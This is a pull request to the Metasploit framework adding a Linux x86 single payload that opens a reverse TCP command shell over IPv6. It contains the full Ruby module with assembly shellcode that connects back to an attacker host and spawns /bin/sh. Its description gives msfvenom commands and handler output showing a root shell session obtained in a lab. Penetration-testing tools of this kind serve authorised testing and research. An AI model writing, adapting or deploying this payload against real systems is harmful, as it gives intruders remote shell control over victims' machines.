### PR TITLE
Add linux/x86/shell_reverse_tcp_ipv6 [single payload]

### DIFF
--- a/modules/payloads/singles/linux/x86/shell_reverse_tcp_ipv6.rb
+++ b/modules/payloads/singles/linux/x86/shell_reverse_tcp_ipv6.rb
@@ -1,0 +1,138 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+
+require 'msf/core/handler/reverse_tcp'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module MetasploitModule
+
+  CachedSize = 167
+
+  include Msf::Payload::Single
+  include Msf::Payload::Linux
+  include Msf::Sessions::CommandShellOptions
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'          => 'Linux Command Shell, Reverse TCP Inline (IPv6)',
+      'Description'   => 'Connect back to attacker and spawn a command shell over IPv6',
+      'Author'        => 'Matteo Malvica <matteo[at]malvica.com>',
+      'License'       => MSF_LICENSE,
+      'Platform'      => 'linux',
+      'Arch'          => ARCH_X86,
+      'Handler'       => Msf::Handler::ReverseTcp,
+      'Session'       => Msf::Sessions::CommandShellUnix
+    ))
+  end
+
+def generate_stage
+      # tcp port conversion
+      port_order = ([1,0]) # byte ordering
+      tcp_port = [datastore['LPORT'].to_i].pack('n*').unpack('H*').to_s.scan(/../) # converts user input into integer and unpacked into a string array
+      tcp_port.pop     # removes the first useless / from  the array
+      tcp_port.shift   # removes the last useless  / from  the array
+      tcp_port = (port_order.map{|x| tcp_port[x]}).join('') # reorder the array and convert it to a string.
+
+      # ipv6 address conversion
+      words  = IPAddr.new(datastore['LHOST']).hton.scan(/..../).map {|i| i.unpack('V')} # converts user's input into ipv6 hex representation
+      first  = words[0].join(', ') # removes brackets, otherwise will reference to a pointer
+      second = words[1].join(', ')
+      third  = words[2].join(', ')
+      fourth = words[3].join(', ')
+
+    payload_data =<<-EOS
+        xor  ebx,ebx
+        mul  ebx
+        push 0x6
+        push 0x1
+        push 0xa
+        mov  ecx,esp
+        mov  al,0x66
+        mov  bl,0x1
+        int  0x80
+        mov  esi,eax
+        xor  eax,eax
+        mov  al,0x2
+        xor  ebx,ebx
+        int  0x80
+        cmp eax,ebx
+        je connect
+        ja exit
+
+      connect:
+        xor  ecx,ecx
+        xor  ebx,ebx
+        push ebx
+        push ebx
+        push #{fourth}
+        push #{third}
+        push #{second}
+        push #{first}
+        push ebx
+        push.i16 0x#{tcp_port}
+        push.i16 0xa
+        mov ecx, esp
+        push.i8 0x1c
+        push ecx
+        push esi
+        xor ebx,ebx
+        xor eax,eax
+        mov al,0x66
+        mov bl,0x3
+        mov ecx,esp
+        int 0x80
+        xor ebx,ebx
+        cmp eax,ebx
+        jne retry
+        xor ecx,ecx
+        mul ecx
+        mov ebx,esi
+        mov al,0x3f
+        int 0x80
+        xor eax,eax
+        inc ecx
+        mov ebx,esi
+        mov al,0x3f
+        int 0x80
+        xor eax,eax
+        inc ecx
+        mov ebx,esi
+        mov al,0x3f
+        int 0x80
+        xor edx,edx
+        mul edx
+        push edx
+        push 0x68732f2f
+        push 0x6e69622f
+        mov ebx,esp
+        push edx
+        push ebx
+        mov ecx,esp
+        mov al,0xb
+        int 0x80
+        ret
+
+      retry:
+        xor ebx,ebx
+        push ebx
+        push.i8 0xa
+        mul ebx
+        mov ebx,esp
+        mov al,0xa2
+        int 0x80
+        jmp connect
+        ret
+
+      exit:
+        xor eax,eax
+        mov al,0x1
+        int 0x80
+    EOS
+
+    Metasm::Shellcode.assemble(Metasm::Ia32.new, payload_data).encode_string
+  end
+end


### PR DESCRIPTION
This payload module is a single shell reverse tcp ipv6, which seems missing from the linux/x86 collection.
I have successully tested it with boht ncat and metasploit handler (see below)
Verification steps

    [on attacker]
```
# msfvenom -p linux/x86/shell_reverse_tcp_ipv6 LHOST=dead:beef::2 LPORT=666 -f elf > drop_it_to_target
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 168 bytes
Final size of elf file: 252 bytes
```
    [on victim]
```
#./drop_it_to_target
```
    [on attacker]
```
#msf exploit(multi/handler) > set LHOST dead:beef::2
LHOST => dead:beef::2
#msf exploit(multi/handler) > set LPORT 666
LPORT => 666
#msf exploit(multi/handler) > set PAYLOAD linux/x86/shell_reverse_tcp_ipv6
PAYLOAD => linux/x86/shell_reverse_tcp_ipv6
#msf exploit(multi/handler) > exploit -j -z
[*] Exploit running as background job 0.
[*] Started reverse TCP handler on dead:beef::2:666
msf exploit(multi/handler) > [*] Command shell session 1 opened (dead:beef::2:666 -> dead:beef::1:40278) at 2018-05-29 18:23:57 +0200
#msf exploit(multi/handler) > sessions 1
[*] Starting interaction with 1...
#id
uid=0(root) gid=0(root) groups=0(root)
#ifconfig | grep inet6
        inet6 fe80::20c:29ff:fe9d:53c9  prefixlen 64  scopeid 0x20<link>
        inet6 dead:beef::1  prefixlen 64  scopeid 0x0<global>
#netstat -antulp | grep 666
tcp6 0 0 dead:beef::1:40278 dead:beef::2:666 ESTABLISHED 2185/./drop_it_to_target
```